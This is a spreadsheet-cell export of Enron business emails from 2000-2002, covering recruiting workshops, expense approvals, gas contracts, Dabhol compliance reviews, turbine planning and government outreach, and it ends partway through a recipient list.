   _x000D_
	_x000D_
	_x000D_
	From:  Dolores Muzzy                           08/30/2000 08:54 AM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
I have you scheduled._x000D_
_x000D_
Dolores_x000D_
_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
08/30/2000 08:13 AM_x000D_
To: Dolores Muzzy/HOU/ECT@ECT_x000D_
cc: Shirley Crenshaw/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: Re:  _x000D_
_x000D_
Dolores_x000D_
_x000D_
Please, register me for a session on 9/29/2000 at 12:45._x000D_
_x000D_
_x000D_
Vince Kaminski_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Celeste Roberts_x000D_
08/29/2000 06:21 PM_x000D_
To: Celeste Roberts/HOU/ECT@ECT_x000D_
cc:  (bcc: Vince J Kaminski/HOU/ECT)_x000D_
Subject: _x000D_
_x000D_
URGENT_x000D_
_x000D_
The Associate and Analyst Recruiting Department will be conducting a number _x000D_
of two hour workshops to review our recruiting and interview process for the _x000D_
fall on-campus recruiting effort.  Critical information regarding our _x000D_
on-campus interview process, revised evaluation forms and program structure _x000D_
will be reviewed during these two hours sessions._x000D_
_x000D_
It is mandatory that all team members attend these workshops.  All team _x000D_
members must attend in order to articulate and demonstrate the Enron _x000D_
recruiting process.  Knowing how busy schedules are, we have made _x000D_
arrangements to present these workshops in two hours sessions for a total of  _x000D_
40 workshops that will run during the last week of August, through the month _x000D_
of September and end at mid October._x000D_
_x000D_
Listed below are the dates, location and times for each session.  Please _x000D_
select a date and time and e-mail this information to my assistant, Dolores _x000D_
Muzzy.  We can accommodate 25 participants at a time.  Dolores will take _x000D_
dates and times on a first come, first serve basis.  We have scheduled enough _x000D_
sessions to accommodate every member of both the Associate and Analyst _x000D_
recruiting teams._x000D_
_x000D_
In order to participate in the recruiting process, you must attend one of _x000D_
these sessions.  We will be tracking participation.  CPE credits will also be _x000D_
given for attending this workshop._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 11:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>&lt;&lt;Concur Expense Document&gt;&gt; - Jeff Hodge 5/19-29/01</t>
  </si>
  <si>
    <t>The following expense report is ready for approval:_x000D_
_x000D_
Employee Name: Jeffrey Hodge_x000D_
Status last changed by:  Automated Administrator_x000D_
Expense Report Name: Jeff Hodge 5/19-29/01_x000D_
Report Total: $692.70_x000D_
Amount Due Employee: $692.70_x000D_
_x000D_
_x000D_
To approve this expense report, click on the following link for Concur _x000D_
Expense._x000D_
http://xms.enron.com</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 07:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'esimien@columbiaenergygroup.com'})</t>
  </si>
  <si>
    <t>Storage true up</t>
  </si>
  <si>
    <t xml:space="preserve">Please forward to Don, my email is not going through._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 10/12/2000 02:09 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Chris Germany_x000D_
10/12/2000 02:08 PM_x000D_
To: esimien@columbiaenergygroup.com, Jeff W Westover/HOU/ECT@ECT_x000D_
cc: Don Kirkindahl, William Kelly/HOU/ECT@ECT _x000D_
Subject: Storage true up_x000D_
_x000D_
I spoke with Rich yesterday.  He said it would be OK to net the storage true _x000D_
up invoice from Ernie with the Sep invoice.  I mailed the invoice via _x000D_
interoffice to Jeff._x000D_
_x000D_
There are 6 or 7 deals that ENA billed CES for September that should probably _x000D_
be billed to New Power.  All of the deals in question are on the Central desk._x000D_
_x000D_
How does the reconciliation look for Jan - June?  Rich said it was his _x000D_
understanding that these months look good and the adjustments are minimal._x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 03:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Dahbol - PPA and Permits/Approvals Compliance</t>
  </si>
  <si>
    <t xml:space="preserve">Bruce:  I think your suggestion makes sense.  An e-mail or voicemail on major _x000D_
developments as they occur would be helpful.  Thanks,   Mark_x000D_
_x000D_
_x000D_
_x000D_
	Bruce Lundstrom@ENRON_DEVELOPMENT_x000D_
	12/13/2000 06:01 AM_x000D_
		 _x000D_
		 To: Mark E Haedicke@ECT_x000D_
		 cc: _x000D_
		 Subject: Dahbol - PPA and Permits/Approvals Compliance_x000D_
_x000D_
Mark -_x000D_
_x000D_
I thought that I would keep you informed of major decisions or analysis on _x000D_
Dahbol from time to time._x000D_
_x000D_
I was pleased to see the quality of our lawyers in India.  I think that it is _x000D_
a solid internal team and we will be relying on the same external lawyers _x000D_
that we have used throughout the life of the project._x000D_
_x000D_
Bruce_x000D_
_x000D_
---------------------- Forwarded by Bruce Lundstrom/ENRON_DEVELOPMENT on _x000D_
12/13/2000 06:01 AM ---------------------------_x000D_
_x000D_
_x000D_
Bruce Lundstrom_x000D_
12/11/2000 11:39 AM_x000D_
To: James A Hughes/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rebecca _x000D_
McDonald/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Rob Walls/NA/Enron@Enron _x000D_
_x000D_
Subject: Dahbol - PPA and Permits/Approvals Compliance_x000D_
_x000D_
Rebecca/Jim -_x000D_
_x000D_
The India legal team has completed two important reviews:_x000D_
_x000D_
Permits/Approvals Review.  Sandeep Katwala led a group reviewing our permits _x000D_
and approvals.  They feel pretty good about our compliance with these _x000D_
permits/approvals.  As you have heard on previous phone calls, the day tank _x000D_
seepage some time ago makes us the most nervous.  It seems to us that a _x000D_
release from the site resulting in substantial groundwater contamination _x000D_
plays pretty well in the court of public opinion given DPC's failure to "come _x000D_
forward" on the issue (even though it was advised at the time of the release _x000D_
that it had no legal obligation to do so).  Sandeep's note is below._x000D_
_x000D_
PPA Review.  Paul Kraske led a group reviewing the PPA.  His memo on this _x000D_
issue is also below.  He feels pretty good about our ongoing compliance with _x000D_
the PPA.  The instances of the non-compliance are not particularly material _x000D_
and none would appear to play well in the court of public opinion.  I should _x000D_
also note that it would be very difficult for MSEB to lawfully terminate the _x000D_
PPA -- that remedy is not readily available to MSEB under the PPA terms._x000D_
_x000D_
Both review efforts have relied somewhat on the representations of DPC _x000D_
personnel.  The India legal team was able to "tie down" many significant _x000D_
issues with written documentation but in many cases have relied on the oral _x000D_
representations of our own employees to confirm compliance with our _x000D_
obligations._x000D_
_x000D_
There are a number of other legal review efforts underway and I will keep you _x000D_
apprised as these reviews progress._x000D_
_x000D_
Bruce_x000D_
---------------------- Forwarded by Bruce Lundstrom/ENRON_DEVELOPMENT on _x000D_
12/11/2000 10:21 AM ---------------------------_x000D_
_x000D_
_x000D_
Sandeep Katwala_x000D_
12/11/2000 07:43 AM_x000D_
To: Bruce Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: jinman@linklaters.com, niyer@linklaters.com, kthakore@linklaters.com, _x000D_
Lauren Hagerty/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: Re: PPA Compliance - Attorney Client Priviledged  _x000D_
_x000D_
Bruce,_x000D_
Lauren, Narayan and Kunal have completed their review of DPC compliance with _x000D_
clearances. Based on discussions with DPC personnel and a review of _x000D_
correspondence where relevant, no material non-compliance issues have _x000D_
surfaced which I feel would pose a problem under the PPA. There are two _x000D_
instances under the Reserve Bank of India approvals DPC has failed to submit _x000D_
reports to the Ministry of Finance within the time frame indicated; these are _x000D_
however minor issues. We have to accept that there may be practical instances _x000D_
where there may not be strict compliance at the site (eg the actual _x000D_
construction of physical assets is not strictly as per the layout approved by _x000D_
the authorities) but, from the discussions with DPC personnel none of these _x000D_
have come to light. On the environment approvals DPC has submitted compliance _x000D_
statements to the Maharashtra State Pollution Control Board which confirm _x000D_
that DPC is in compliance with the conditions in the relevant approvals. We _x000D_
have relied on these statements as being accurate. _x000D_
_x000D_
With respect to the water pollution issue, as we saw on Saturday, DPC has _x000D_
notified MPCB pursuant to the show cause notice of the measures taken to _x000D_
mitigate the pollution off the site. That correspondence seemed to indicate _x000D_
that there should be no further problems with this issue. However, my sense _x000D_
is that we have not seen the end of this issue and in particular, the report _x000D_
currently being prepared by GSDA has not yet surfaced in final form. There is _x000D_
no guarantee that it will be positive. Shobhan's view that it is difficult to _x000D_
see how a Court would support an injunction of some sort shutting down the _x000D_
plant "permanently" given the remedial measures taken by DPC is persuasive - _x000D_
you can however see that it provides excellent ammunition for PR purposes._x000D_
_x000D_
Sandeep_x000D_
_x000D_
_x000D_
_x000D_
Paul Kraske_x000D_
12/11/2000 06:23 PM_x000D_
To: Sandeep Katwala/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bruce _x000D_
Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: jonathan.inman@linklaters.com, Pancharatnam _x000D_
Ramaswamy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Suhas _x000D_
Tuljapurkar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
_x000D_
Subject: PPA Compliance - Attorney Client Priviledged_x000D_
_x000D_
Gentlemen-_x000D_
Attached is a short note we prepared summarizing our conclusions after an _x000D_
initial review of PPA compliance.  Please feel free to call if you have any _x000D_
questions regarding the attached.  Regards,_x000D_
Paul_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Jul 2000 04:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Cogentrix Turbine Inquiry</t>
  </si>
  <si>
    <t xml:space="preserve">Janet, its your book - if you feel we have the LM's licked and we need the _x000D_
resources/the value at risk is minimal, I would go ahead._x000D_
_x000D_
I would get Calger on side as well._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 07/18/2000 _x000D_
11:50 AM ---------------------------_x000D_
_x000D_
_x000D_
Janet R Dietrich_x000D_
07/18/2000 09:02 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Cogentrix Turbine Inquiry_x000D_
_x000D_
Dave, have you had a chance to give this much thought? _x000D_
---------------------- Forwarded by Janet R Dietrich/HOU/ECT on 07/18/2000 _x000D_
09:00 AM ---------------------------_x000D_
_x000D_
_x000D_
Janet R Dietrich_x000D_
07/14/2000 08:46 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: Christopher F Calger/PDX/ECT@ECT _x000D_
Subject: Re: Cogentrix Turbine Inquiry  _x000D_
_x000D_
As a matter of fact, this is on my list to discuss with you. I think we _x000D_
should pick up the 7EA's and maybe the 501D's as well (doubt we could pick _x000D_
and choose). I met with Mark Frevert yesterday afternoon to discuss the East _x000D_
Generation Strategy (along with Ben Jacoby and Don Miller) and he wanted me _x000D_
to talk with Larry Izzo about us taking all 4 turbines. Should I go ahead and _x000D_
have that discussion or would you like to discuss this in more detail first? _x000D_
The LM6000 position looks like this:_x000D_
_x000D_
24 turbines allocated:_x000D_
_x000D_
4 City of Austin_x000D_
4 Enron South America_x000D_
4 Las Vegas Cogen_x000D_
6 Public Service of Colorado_x000D_
6 Florida Merchant plant_x000D_
_x000D_
_x000D_
Heather Kroll and Ozzie Pagan are bringing their VEPCO/North Carolina deal to _x000D_
a point where we will probably need to make a decision in the next 2-3 weeks. _x000D_
It has a 4-year PPA and we are basically obligated to build a power plant to _x000D_
back-fill the position. The PPA will be able to be served from the market or _x000D_
plant, and we would need to use 4 of the 6 dual-fuel LM's currently allocated _x000D_
to Florida. There is a possibility we could go back to the 501D's but we'll _x000D_
have to see. The ecomomics of the deal leave Enron with about a 40-45% _x000D_
residual value on the plant at the end of 4 years, and Bruce Sukaly is in the _x000D_
process of showing this entire project to 4 counterparties in order to _x000D_
monetize the entire position._x000D_
_x000D_
We still have 2-3 other customers looking at the LM's although they are _x000D_
moving fairly slow._x000D_
_x000D_
I'd like to discuss our development strategy in a little more detail with you _x000D_
when you return but here are the highlights: Ben and his team will be looking _x000D_
to increase the sites we have under our control in several regions: PJM, _x000D_
ECAR, Georgia, and Florida to name a few. I think we may want to consider _x000D_
some configurations that include combined-cycle options that have a 5-year _x000D_
term (vs. our standard 2-year currently), primarily in Florida and maybe _x000D_
Georgia. Ben is putting this on paper along with the incremental resource _x000D_
needs and incremental developmental dollars needed. I think we should talk _x000D_
about increasing our site bank/development portfolio in Canada as well.  _x000D_
_x000D_
Let me know your thoughts! Thanks. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Apr 2000 11:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'joan.veselack@enron.com', 'joann.collins@enron.com', 'dick.jenkins@enron.com', 'scott.goodell@enron.com', 'brenda.fletcher@enron.com', 'mark.feldman@enron.com', 'robin.barbe@enron.com'})</t>
  </si>
  <si>
    <t>CGAS contract 64231</t>
  </si>
  <si>
    <t xml:space="preserve">This is a good time to bring this up.  Unless the original CES agreement has _x000D_
changed, ENA will pay CALP a monthly demand charge of $103,417 from 1/1/2000 _x000D_
- 4/30/2000.  From 6/1/2000 - 7/7/2000, ENA will pay a (volumetric) demand _x000D_
charge of $.02/mmbtu to CALP for any volumes utilized by ENA._x000D_
_x000D_
Which brings up 2 important points;_x000D_
 1.The month of May has not been addressed which means Robin needs to discuss _x000D_
this with CALP (and she may have already)_x000D_
     However, currently we will not be showing any demand estimates for May._x000D_
_x000D_
 2.  It's a new ball game starting 7/8/2000._x000D_
_x000D_
Comments/questions?_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 04/10/2000 05:57 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Brenda H Fletcher_x000D_
04/10/2000 04:37 PM_x000D_
To: Chris Germany/HOU/ECT@ECT_x000D_
cc: Scott Goodell/Corp/Enron@ENRON _x000D_
Subject: CGAS contract 64231_x000D_
_x000D_
This contract is on the ECT April spreadsheet under CES Wholesale.  What is _x000D_
the relationship between ENA and Commonwealth Atlantic?_x000D_
(Who pays transport invoice?  Any reimbursements?)_x000D_
_x000D_
Thanks,_x000D_
Brenda_x000D_
</t>
  </si>
  <si>
    <t>Sun, 25 Mar 2001 04:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ben.jacoby@enron.com', 'carlos.sole@enron.com', 'jkeffer@kslaw.com', 'chris.booth@enron.com', 'jeffrey.hodge@enron.com', 'mreuter@kslaw.com'})</t>
  </si>
  <si>
    <t>200 Team meeting re NW exclusivity</t>
  </si>
  <si>
    <t xml:space="preserve">Opps.  I should add that Mr. Hodge has a free pass to miss this and all other _x000D_
NW phone calls._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 03/25/2001 12:06 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
03/25/2001 12:04 PM_x000D_
To: Ben Jacoby/HOU/ECT@ECT, Chris Booth/NA/Enron@Enron, jkeffer@kslaw.com, _x000D_
mreurter@kslaw.com, Jeffrey T Hodge/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: 200 Team meeting re NW exclusivity_x000D_
_x000D_
Hi there,_x000D_
_x000D_
Just confirming a 200 CST Enron team conference call.  Is this going to work _x000D_
for everyone, with the exception of Carlos, who is now excused?_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 05:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Accenture offering Practice job interview experience Plus $$$</t>
  </si>
  <si>
    <t>To follow is a message regarding practice interviews offered by Accenture._x000D_
THIS IS NOT AN AVENUE TO A JOB WITH ACCENTURE, rather, you're helping the_x000D_
company to develop their interview process and train their recruiters. So if_x000D_
you volunteer, please don't put the press on these people . . ._x000D_
_x000D_
_x000D_
_x000D_
Accenture is looking for seven individuals to serve as experienced practice_x000D_
interviewees at our San Francisco office on Thursday, May 24th. The session_x000D_
will be held from 1pm-5pm, and lunch will be served. In addition to earning_x000D_
$50, participants will be reimbursed for their travel expenses to and from_x000D_
the session._x000D_
_x000D_
Participants will:_x000D_
Meet with Accenture executives to conduct practice interviews._x000D_
Receive feedback from real interviewers._x000D_
Get paid $50 plus round trip transportation expenses._x000D_
_x000D_
_x000D_
Criteria : Individuals in any master's degree program with a 3.0 GPA and 2+_x000D_
years of work experience._x000D_
_x000D_
Interested students should email resumes to Christina Roemer at_x000D_
christina.roemer@accenture.com. Resumes will be reviewed and potential_x000D_
participants will be contacted via telephone. Then a confirmation for_x000D_
participation will be sent via email with specific information regarding_x000D_
the session._x000D_
_x000D_
***NOTE: These interviews are for PRACTICE PURPOSES ONLY and have no_x000D_
bearing on future interviewing and/or employment opportunities with_x000D_
Accenture.***_x000D_
_x000D_
Christina Roemer_x000D_
Accenture - St. Charles, IL_x000D_
People Enablement - Training Operations, Conduct &amp; Support_x000D_
Phone: 1.630.444.5449_x000D_
VPN: 49/45449_x000D_
Email: christina.roemer@accenture.com_x000D_
_x000D_
_x000D_
It's a great chance to buff up your skills--_x000D_
Jenny_x000D_
_x000D_
Account Representative, MBA Recruiting_x000D_
Haas School of Business, UC Berkeley_x000D_
T 510-643-4212_x000D_
F 510-643-5257_x000D_
E rowe@haas.berkeley.edu_x000D_
_x000D_
SanFran Grad.doc</t>
  </si>
  <si>
    <t>Mon, 14 May 2001 06:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Delta/Salmon</t>
  </si>
  <si>
    <t>Hi Catherine,_x000D_
_x000D_
Would it  be appropriate for me to call Karl or someone to try to get the _x000D_
original docs?  I have this urge to get something off of my "to do" list, and _x000D_
this looks like a good candidate. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 03:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>580930.01</t>
  </si>
  <si>
    <t xml:space="preserve">Kate, amerex said cp should be Coral Power instead of El Paso _x000D_
_x000D_
, THANKS </t>
  </si>
  <si>
    <t>Thu, 20 Jun 2002 14:24:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'r..price@enron.com'})</t>
  </si>
  <si>
    <t>CNR</t>
  </si>
  <si>
    <t>Thanks for the invoices and the Tidelanders Chorus info._x000D_
_x000D_
You gave me Feb and Mar 2002.  Do you have the Dec 2001 and Jan 2002 invoices?</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 08:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Just Two Words</t>
  </si>
  <si>
    <t xml:space="preserve">Heck, we all know sending an agreement out for signature doesn't mean getting _x000D_
them back signed.  If we had every agreement signed we sent out, we'd be at _x000D_
1000!_x000D_
_x000D_
_x000D_
_x000D_
	Marie Heard@ENRON COMMUNICATIONS_x000D_
	11/15/2000 04:12 PM_x000D_
		_x000D_
		 To: Tana Jones/HOU/ECT@ECT@ENRON_x000D_
		 cc: Samantha Boyd/NA/Enron@Enron, Stephanie Panus/NA/Enron@Enron, Susan _x000D_
Bailey/HOU/ECT@ECT@ENRON_x000D_
		 Subject: Re: Just Two Words_x000D_
_x000D_
So, I'm getting ready to send out my 5th for signature.  You might as well _x000D_
start lining up your people and I'll start lining up mine, cause I can tell _x000D_
you right now, I WANT A RECOUNT!!!!!!!!!!!!_x000D_
_x000D_
Marie Heard_x000D_
Senior Legal Specialist_x000D_
Enron Broadband Services_x000D_
Phone:  (713) 853-3907_x000D_
Fax:  (713) 646-8537_x000D_
Marie_Heard@Enron.net_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones@ECT_x000D_
	11/15/00 04:05 PM_x000D_
		 _x000D_
		 To: Marie Heard/Enron Communications@Enron Communications_x000D_
		 cc: Susan Bailey/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron, Stephanie _x000D_
Panus/NA/Enron@Enron_x000D_
		 Subject: Just Two Words_x000D_
_x000D_
Mieco 471_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Jun 2000 05:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Practice</t>
  </si>
  <si>
    <t>I am going to Austin for the day on the 8th.  Will be back early evening and _x000D_
all day sunday._x000D_
PL</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Continue Enjoying IIJournals -- Renew Today!</t>
  </si>
  <si>
    <t xml:space="preserve">Shirley,_x000D_
_x000D_
Did we renew it?_x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/19/2001=_x000D_
=20_x000D_
03:31 PM ---------------------------_x000D_
_x000D_
_x000D_
Institutional Investor Journals &lt;webinfo@iijournals.com&gt; on 04/19/2001=20_x000D_
11:03:59 AM_x000D_
To: "vkamins@enron.com" &lt;vkamins@enron.com&gt;_x000D_
cc: =20_x000D_
Subject: Continue Enjoying IIJournals -- Renew Today!_x000D_
_x000D_
_x000D_
Dear Vince Kaminski,_x000D_
_x000D_
We hope you are enjoying the benefits of receiving market-leading, rigorous=_x000D_
=20_x000D_
and current research from industry experts through your subscription to=20_x000D_
DERIVATIVES QUARTERLY._x000D_
_x000D_
Unfortunately, your subscription is about to expire!  By renewing now, your=_x000D_
=20_x000D_
access to the web site and to your print copies will be uninterrupted._x000D_
_x000D_
You can continue to get the exclusive research and practical advice for=20_x000D_
financial practitioners =01) written by the best minds in your business!_x000D_
_x000D_
Click here to Renew Today_x000D_
http://www.iijournals.com/account/myaccount.asp_x000D_
_x000D_
Thank you._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 15:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'linda.robertson@enron.com', 'james.steffes@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Western Governors update</t>
  </si>
  <si>
    <t xml:space="preserve">All---here's an update on what we've been doing with the Governors.  Should I _x000D_
be putting Steve Kean on these email updates?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
As you all know, there were several governors events over the past 3 to 4 _x000D_
days in Washington DC:_x000D_
_x000D_
Paul and I met with Steve Reynolds from Wyoming Gov Geringer's office.  They _x000D_
would like us to put forward the name of an Enron individual that could _x000D_
participate in an Energy council that is being formed (actually commissioned _x000D_
by the legislature) to study energy issues for the state.  Geringer would _x000D_
also like to come to Houston to learn about our vision in moving from an _x000D_
assets based to a market based entity.  _x000D_
_x000D_
We had contacted Scott Cealy (spelling) with Arizona Governor Hull's office _x000D_
last week and  Paul sat with Gov Hull at the RGA dinner on Monday night and _x000D_
had a chance to thank her for her  leadership in opposing price caps. Mr. _x000D_
Cealy left me a voice mail this afternoon basically inviting us to come to _x000D_
see them. I will schedule that meeting (boy that Paul must have been charming _x000D_
at dinner!!!)_x000D_
_x000D_
I sat with Gary Smith, political guy with Gov Kempthorne's office who _x000D_
indicated that Kempthorne was scheduled to meet with Vice Pres Cheney on _x000D_
Tuesday afternoon.  Gov Kitzhaber was also scheduled to attend the meeting _x000D_
with Cheney, but there was speculation that he may not come.  I have not _x000D_
confirmed the outcome of that meeting, but was invited by Mr. Smith to call _x000D_
him once they get back to Idaho tommorrow.  I will place that call and see _x000D_
what I can find out.  Mr. Racicot was going to get back to us on what he _x000D_
found out from Kempthorne---has Linda or Rick heard from him?  I will be _x000D_
continueing outreach with Gary Smith on as routine a basis is acceptable to _x000D_
him._x000D_
_x000D_
We have committed to an RGA event in Aspen Colorado on March 30 that Governor _x000D_
Owens is sponsoring.  Paul and I continue to keep in touch with Gov Owens _x000D_
staff.  As most of you know from previous updates, Owens is strong in his _x000D_
support against price caps and market based solutions._x000D_
_x000D_
At our meeting with Racicot on Monday in DC Paul requested some assistance _x000D_
from him in setting up a meeting with Kitzhaber.  Linda--how do we want to _x000D_
follow up on that request?_x000D_
_x000D_
Rick and Paul met with Gov Gary Locke on Tuesday and while they disagreed _x000D_
with Lockes position, the discussion was civil and at least left the door _x000D_
open to future discussions.  Rick and Paul will manage this relationship for _x000D_
now._x000D_
_x000D_
We have not has great success in meeting with Leavitt.  I will continue to _x000D_
work on setting that up.  Guinn has also not been extremely receptive to _x000D_
meeting with us and Paul and I will look at how/whether we continue to knock _x000D_
on that door.  We are not actively looking to meet with Montana due to some _x000D_
commercial reasons._x000D_
_x000D_
There are a number of other ongoing actions (WGA contacts, providing info, _x000D_
etc), but the above update should give everybody the highlights._x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Feb 2001 05:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 02/13/2001 _x000D_
01:08 PM ---------------------------_x000D_
_x000D_
_x000D_
Mike Grigsby_x000D_
01/22/2001 12:08 PM_x000D_
To: Matthew Lenhart/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Power Plants_x000D_
_x000D_
Matt,  _x000D_
_x000D_
Please take a look at these spreadsheets and calc the gas usage by plant and _x000D_
by pipe in CA.  Chris Foster is telling us that most of these palnts will be _x000D_
shutting down in the next few weeks due to credit exposure.  Let's discuss _x000D_
the impact on sendouts._x000D_
_x000D_
Thanks,_x000D_
Grigsby_x000D_
---------------------- Forwarded by Mike Grigsby/HOU/ECT on 01/22/2001 01:05 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Chris H Foster                           01/18/2001 03:45 PM_x000D_
	_x000D_
_x000D_
To: Mike Grigsby/HOU/ECT@ECT, Phillip K Allen/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Power Plants_x000D_
_x000D_
Philip is a list of the gas plants.  CEC list is all plants including QFs and _x000D_
non QFs (i.e.utility plants and the IPPs - Reliant, SOuthern et al).  _x000D_
_x000D_
Chris_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Feb 2000 10:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Calpine model</t>
  </si>
  <si>
    <t>Ben,_x000D_
_x000D_
I think we need to clean the Calpine model. We will get the firmer pricing _x000D_
from Structuring tomorrow. As soon as we have that, we need to come back to _x000D_
Scott with the pricing and the model. Here is some comments._x000D_
_x000D_
- Install switch to see unlevered IRR_x000D_
- Clean up IDC_x000D_
_x000D_
Scott wants to see what would be the capacity pricing to get unlevered IRR of _x000D_
9%. Let's talk in the morning. _x000D_
_x000D_
Jinsung</t>
  </si>
  <si>
    <t>Fri, 22 Jun 2001 12:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marty.sunde@enron.com', 'kevin.hughes@enron.com', 'tony.spruiell@enron.com', 'kathryn.corbally@enron.com', 'gordon.savage@enron.com', 'chris.holmes@enron.com', 'erika.dupre@enron.com', 'kathy.bass@enron.com', 'richard.zdunkewicz@enron.com', 'angela.schwarz@enron.com', 'richard.sanders@enron.com', 'gfergus@brobeck.com', 'eric.letke@enron.com', 'paul.kaufman@enron.com', 'jeremy.blachman@enron.com', 'harry.kingerski@enron.com', 'mark.muller@enron.com', 'tanya.leslie@enron.com', 'leticia.botello@enron.com', 'robert.frank@enron.com', 'james.lewis@enron.com', 'james.wright@enron.com', 'greg.wolfe@enron.com', 'robert.williams@enron.com', 'jeff.messina@enron.com', 'sandra.mccubbin@enron.com', 'john.neslage@enron.com', 'eric.melvin@enron.com', 'neil.hong@enron.com', 'sgovenar@govadv.com', 'jennifer.rudolph@enron.com', 'dorothy.youngblood@enron.com', 'triley@enron.com', 'harold.buchanan@enron.com', 'wgang@enron.com', 'david.leboe@enron.com', 'karen.denne@enron.com', 'william.bradford@enron.com', 'jklauber@llgm.com', 'hgovenar@govadv.com', 'mpalmer@enron.com', 'michael.etringer@enron.com', 'rosalinda.tijerina@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'scott.stoness@enron.com', 'ted.murphy@enron.com', 'dan.leff@enron.com', 'beverly.aden@enron.com', 'paula.warren@enron.com', 'wanda.curry@enron.com', 'steve.walker@enron.com', 'chris.foster@enron.com', 'vicki.sharp@enron.com', 'martin.wenzel@enron.com', 'tasha.lair@enron.com', 'kathy.dodgen@enron.com', 'alan.comnes@enron.com', 'douglas.condon@enron.com', 'terri.greenlee@enron.com', 'tim.belden@enron.com', 'marsha.suggs@enron.com', 'richard.leibert@enron.com', 'michael.mann@enron.com', 'sarah.novosel@enron.com', 'gayle.muench@enron.com', 'don.black@enron.com', 'rita.hennessy@enron.com', 'scott.gahn@enron.com', 'michelle.cisneros@enron.com', 'mike.smith@enron.com', 'craig.sutter@enron.com', 'christina.liscano@enron.com', 'janel.guerrero@enron.com', 'fran.deltoro@enron.com', 'meredith.eggleston@enron.com', 'cathy.corbin@enron.com', 'vladimir.gorny@enron.com', 'ken.gustafson@enron.com', 'neil.bresnan@enron.com', 'skean@enron.com', 'iris.waser@enron.com', 'dennis.benevides@enron.com', 'michael.tribolet@enron.com', 'richard.shapiro@enron.com', 'sharon.dick@enron.com', 'edward.sacks@enron.com', 'carol.moffett@enron.com', 'leasa.lopez@enron.com', 'debora.whitehead@enron.com', 'douglas.huth@enron.com', 'roger.yang@enron.com', 'dirk.vanulden@enron.com', 'jubran.whalan@enron.com', 'james.steffes@enron.com', 'evan.hughes@enron.com', 